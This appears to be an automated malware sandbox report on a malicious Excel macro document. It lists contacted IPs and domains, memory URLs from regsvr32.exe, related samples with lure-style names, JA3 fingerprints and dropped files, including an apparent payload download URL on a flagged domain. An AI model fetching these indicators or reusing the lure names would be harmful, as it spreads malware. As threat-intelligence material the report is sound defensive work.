http://thousandsyears.download/div/44376,8555986111.jpg	false	Avira URL Cloud: safe	unknown
astrocycle.download	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.linkedin.com	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra/1.0.385/directories	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://dc.ads.linkedin.com/collect/?pid=3038&fmt=gif	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://c0.b0.p.awsstatic.com	regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	regsvr32.exe, 00000004.00000003.2089238305.0000000000245000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.regional-table.region-services.aws.a2z.com	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra/1.0.385/librastandardlib	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/ar/	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://a0.p.awsstatic.com	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/cn/?nc1=h_ls	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&src=default	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/ru/	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://www.buzzsprout.com;	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2091748427.00000000001FE000.00000004.00000020.sdmp	false		high
https://i18n-string.us-west-2.prod.pricing.aws.a2z.com	regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/ru/?nc1=h_ls	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://docs.aws.amazon.com/index.html?nc2=h_ql_doc	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/ar/?nc1=h_ls	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://p.adsymptotic.com	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/th/	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://docs.aws.amazon.com	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false		high
http://www.windows.com/pctv.	regsvr32.exe, 00000004.00000002.2093193862.00000000031B0000.00000002.00000001.sdmp	false		high
https://aws.amazon.com/marketplace/?nc2=h_mo	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://d2a6igt6jhaluh.cloudfront.net	regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false		high
http://crl.sca1b.amazontrus	regsvr32.exe, 00000004.00000003.2089207344.000000000020C000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.sca1b.amazontrust.com06	regsvr32.exe, 00000004.00000003.2089207344.000000000020C000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://console.aws.amazon.com/support/home/?nc2=h_ql_cu	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://dftu77xade0tc.cloudfront.net	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/search/	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/?nc2=h_lg	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	regsvr32.exe, 00000004.00000003.2089207344.000000000020C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://console.aws.amazon.com/support/home/?nc1=f_dr	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/lib	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/vi/	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
http://crl.rootg2.amazontrust.com/rootg2.crl0	regsvr32.exe, 00000004.00000003.2089223405.0000000000228000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-19K4ETMBBQKFHE49GBTTFX-Content-Ty	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://aws.amazon.com/tw/	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/tr/?nc1=h_ls	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/fr/?nc1=h_ls	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://d1fgizr415o1r6.cloudfront.net	regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-search/1.0.13/js	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://prod-us-west-2.csp-report.marketing.aws.dev/submit	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://f0.awsstatic.com	regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	regsvr32.exe, 00000004.00000002.2091798590.0000000000255000.00000004.00000020.sdmp	false		high
https://spot-bid-advisor.s3.amazonaws.com	regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2089207344.000000000020C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2089170751.0000000000255000.00000004.00000001.sdmp	false		high
https://d3ctxlq1ktw2nl.cloudfront.net	regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://amazonwebservices.d2.sc.omtrdc.net	regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://aws.amazon.com/podcasts/aws-podcast/	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://d1yyh5dhdgifnx.cloudfront.net	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/jp/	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://d1hemuljm71t2j.cloudfront.net	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/css/1.0.382	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://view-stage.us-west-2.prod.pricing.aws.a2z.com	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	false		high
https://s3.amazonaws.com/public-pricing-agc/	regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/de/	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
http://investor.msn.com/	regsvr32.exe, 00000004.00000002.2093193862.00000000031B0000.00000002.00000001.sdmp	false		high
https://phd.aws.amazon.com/?nc2=h_m_sc	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra/1.0.385/libra-cardsui	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
http://www.%s.comPA	regsvr32.exe, 00000004.00000002.2092803590.0000000002DC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&src=default	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com	regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false		high
https://pages.awscloud.com/fico-case-study.html?hp=tile&story=fico	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://ssl-static.libsyn.com	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false		high
https://website.spot.ec2.aws.a2z.com	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	false		high
https://112-tzm-766.mktoutil.com	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://static.doubleclick.net	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/th/?nc1=f_ls	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
http://investor.msn.com	regsvr32.exe, 00000004.00000002.2093193862.00000000031B0000.00000002.00000001.sdmp	false		high
https://aws.amazon.com/tr/	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/g11n-lib/2.0.76	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://s0.awsstatic.com	regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://www.amazon.jobs/aws	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://dc.ads.linke	regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://googleads.g.doubleclick.net	regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false		high
https://s3.amazonaws.com/aws-messaging-pricing-information/	regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false		high
https://download.stormacq.com/aws/podcast/	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.js	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://console.aws.amazon.com/support/home?nc2=h_ql_cu	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://d2908q01vomqb2.cloudfront.net	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	regsvr32.exe, 00000004.00000003.2089238305.0000000000245000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dgen8gghn3u86.cloudfront.net	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	false		high
https://pages.awscloud.com	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false		high
https://aws.amazon.com/vi/?nc1=f_ls	regsvr32.exe, 00000004.00000003.2088949225.0000000002C0D000.00000004.00000001.sdmp	false		high
https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com	regsvr32.exe, 00000004.00000002.2092756344.0000000002C09000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/aws-blog/1.0.47/js	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://chtbl.com	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dk261l6wntthl.cloudfront.net	regsvr32.exe, 00000004.00000003.2089202347.0000000002C0A000.00000004.00000001.sdmp	false		high
https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.css	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high
https://console.aws.amazon.com/billing/home?nc2=h_m_bc	regsvr32.exe, 00000004.00000003.2089123849.0000000002C1C000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.198.51	thousandsyears.download	United States	13335	CLOUDFLARENETUS	false
143.204.91.74	dr49lng3n1n2s.cloudfront.net	United States	16509	AMAZON-02US	false
172.67.213.115	astrocycle.download	United States	13335	CLOUDFLARENETUS	true
172.67.146.88	uppercilio.fun	United States	13335	CLOUDFLARENETUS	false
104.21.12.122	voopeople.fun	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	444737
Start date:	06.07.2021
Start time:	16:13:37
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PI-9823472110866.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSM@7/4@7/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 65.4% (good quality ratio 51.5%) Quality average: 59.5% Quality standard deviation: 39.6%
HCA Information:	Successful, ratio: 76% Number of executed functions: 12 Number of non-executed functions: 3
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
172.67.198.51	uhr908723097306.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	List-4527768.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
	PI-210610.xlsm	Get hash	malicious	Browse	thousandsyears.download/div/44376,8555986111.jpg
143.204.91.74	uhr908723097306.xlsm	Get hash	malicious	Browse
	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse
	f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dll	Get hash	malicious	Browse
	8f9b032ff6f56a685f4c6f9eb57784811d6c98aa83b0c.dll	Get hash	malicious	Browse
	718421.xlsm	Get hash	malicious	Browse
	paxi1.dll	Get hash	malicious	Browse
	7hu4M2hAe7.dll	Get hash	malicious	Browse
	lQsa52UcOF.xlsb	Get hash	malicious	Browse
	b8c033482291a3c073483fc23df165d39fd79c6f22144.dll	Get hash	malicious	Browse
	jLyCpYVr6p.dll	Get hash	malicious	Browse
	E7D5105D3408A45C1003172B9A1AA3A1E60F7AC6E07E8.dll	Get hash	malicious	Browse
	BA6D707A66005C28EA843C2F7623AF7B7B09B1C02FCF0.dll	Get hash	malicious	Browse
	3AC49BC78F8FCB40EEA7016B3319401AF6CF19149586E.dll	Get hash	malicious	Browse
172.67.213.115	uhr908723097306.xlsm	Get hash	malicious	Browse	astrocycle.download/
	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	astrocycle.download/
	List-4527768.xlsm	Get hash	malicious	Browse	astrocycle.download/
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	astrocycle.download/
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	astrocycle.download/
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	astrocycle.download/
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	astrocycle.download/
	PI-210610.xlsm	Get hash	malicious	Browse	astrocycle.download/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
astrocycle.download	uhr908723097306.xlsm	Get hash	malicious	Browse	172.67.213.115
	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	172.67.213.115
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	104.21.37.209
	List-4527768.xlsm	Get hash	malicious	Browse	172.67.213.115
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	172.67.213.115
	Formtofill4184860.xlsm	Get hash	malicious	Browse	104.21.37.209
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	172.67.213.115
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	104.21.37.209
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	172.67.213.115
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	172.67.213.115
	PI-210610.xlsm	Get hash	malicious	Browse	172.67.213.115
thousandsyears.download	uhr908723097306.xlsm	Get hash	malicious	Browse	172.67.198.51
	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	172.67.198.51
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	172.67.198.51
	List-4527768.xlsm	Get hash	malicious	Browse	172.67.198.51
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	172.67.198.51
	Formtofill4184860.xlsm	Get hash	malicious	Browse	104.21.52.111
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	172.67.198.51
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	172.67.198.51
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	172.67.198.51
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	172.67.198.51
	PI-210610.xlsm	Get hash	malicious	Browse	172.67.198.51
uppercilio.fun	uhr908723097306.xlsm	Get hash	malicious	Browse	104.21.55.83
	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	104.21.55.83
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	172.67.146.88
	List-4527768.xlsm	Get hash	malicious	Browse	172.67.146.88
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	104.21.55.83
	Formtofill4184860.xlsm	Get hash	malicious	Browse	172.67.146.88
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	104.21.55.83
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	104.21.55.83
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	104.21.55.83
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	104.21.55.83
	PI-210610.xlsm	Get hash	malicious	Browse	104.21.55.83
voopeople.fun	uhr908723097306.xlsm	Get hash	malicious	Browse	172.67.194.117
	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	172.67.194.117
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	172.67.194.117
	List-4527768.xlsm	Get hash	malicious	Browse	172.67.194.117
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	172.67.194.117
	Formtofill4184860.xlsm	Get hash	malicious	Browse	172.67.194.117
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	104.21.12.122
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	172.67.194.117
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	172.67.194.117
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	172.67.194.117
	PI-210610.xlsm	Get hash	malicious	Browse	172.67.194.117

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	uhr908723097306.xlsm	Get hash	malicious	Browse	172.67.194.117
	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	172.67.194.117
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	172.67.194.117
	List-4527768.xlsm	Get hash	malicious	Browse	172.67.194.117
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	172.67.194.117
	Formtofill4184860.xlsm	Get hash	malicious	Browse	172.67.194.117
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	104.21.12.122
	runsys32.dll	Get hash	malicious	Browse	104.20.185.68
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	172.67.194.117
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	172.67.194.117
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	172.67.194.117
	SMR8OzIgNB.exe	Get hash	malicious	Browse	104.21.8.151
	Follow up Purchase order num- 4500262450.exe	Get hash	malicious	Browse	104.21.75.42
	PI-210610.xlsm	Get hash	malicious	Browse	172.67.194.117
	2790000.dll	Get hash	malicious	Browse	104.20.185.68
	2770174.dll	Get hash	malicious	Browse	104.20.185.68
	Payment Invoice.exe	Get hash	malicious	Browse	172.67.188.154
	rial exe.exe	Get hash	malicious	Browse	104.21.19.200
	Quotation.exe	Get hash	malicious	Browse	104.21.19.200
	SCTc9qaix4.exe	Get hash	malicious	Browse	1.0.0.1
AMAZON-02US	uhr908723097306.xlsm	Get hash	malicious	Browse	143.204.91.74
	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	143.204.91.74
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	143.204.91.74
	List-4527768.xlsm	Get hash	malicious	Browse	13.225.75.73
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	13.225.75.73
	Formtofill4184860.xlsm	Get hash	malicious	Browse	13.225.75.73
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	13.224.92.73
	Reciept 19129475.xlsb	Get hash	malicious	Browse	54.191.98.150
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	13.224.92.73
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	13.224.92.73
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	13.224.92.73
	PI-210610.xlsm	Get hash	malicious	Browse	143.204.4.74
	GDTGz3GXCiNgYwtXT6qX3tY8eu8Mqj.msi	Get hash	malicious	Browse	18.231.168.212
	39d0c1e7.msi	Get hash	malicious	Browse	3.143.159.48
	Movcy_v1.0.0.apk	Get hash	malicious	Browse	52.39.180.2
	order No. 00192099##001 pdf.exe	Get hash	malicious	Browse	3.143.65.214
	f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dll	Get hash	malicious	Browse	143.204.91.74
	lZYIQJNUsZ.exe	Get hash	malicious	Browse	13.249.12.162
	q62NZgHtRq.exe	Get hash	malicious	Browse	3.22.53.161
	i	Get hash	malicious	Browse	52.9.197.152

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	uhr908723097306.xlsm	Get hash	malicious	Browse	143.204.91.74
	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse	143.204.91.74
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse	143.204.91.74
	List-4527768.xlsm	Get hash	malicious	Browse	143.204.91.74
	HRcontacts7752205.xlsm	Get hash	malicious	Browse	143.204.91.74
	Formtofill4184860.xlsm	Get hash	malicious	Browse	143.204.91.74
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	143.204.91.74
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	143.204.91.74
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	143.204.91.74
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	143.204.91.74
	PI-210610.xlsm	Get hash	malicious	Browse	143.204.91.74
	108020075.exe	Get hash	malicious	Browse	143.204.91.74
	G-DECL G50 EURL.xlsx	Get hash	malicious	Browse	143.204.91.74
	1.doc	Get hash	malicious	Browse	143.204.91.74
	DECL G50 EURL!.xlsx	Get hash	malicious	Browse	143.204.91.74
	Order No. 211128.doc	Get hash	malicious	Browse	143.204.91.74
	SOA.xlsx	Get hash	malicious	Browse	143.204.91.74
	DECL G50 EURL.xlsx	Get hash	malicious	Browse	143.204.91.74
	WO 378871.xlsb	Get hash	malicious	Browse	143.204.91.74
	Order 824126.xlsb	Get hash	malicious	Browse	143.204.91.74

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml	uhr908723097306.xlsm	Get hash	malicious	Browse
	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse
	List-4527768.xlsm	Get hash	malicious	Browse
	HRcontacts7752205.xlsm	Get hash	malicious	Browse
	Formtofill4184860.xlsm	Get hash	malicious	Browse
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse
	Outfordelivery799862.xlsm	Get hash	malicious	Browse
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse
	DeliveryConf535215.xlsm	Get hash	malicious	Browse
	PI-210610.xlsm	Get hash	malicious	Browse
C:\Users\user\XTOWN.dll	uhr908723097306.xlsm	Get hash	malicious	Browse
	Vac.list07-2021-6014910.xlsm	Get hash	malicious	Browse
	Vac.list07-20214862208.xlsm	Get hash	malicious	Browse
	List-4527768.xlsm	Get hash	malicious	Browse
	HRcontacts7752205.xlsm	Get hash	malicious	Browse
	Formtofill4184860.xlsm	Get hash	malicious	Browse
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse
	Outfordelivery799862.xlsm	Get hash	malicious	Browse
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse
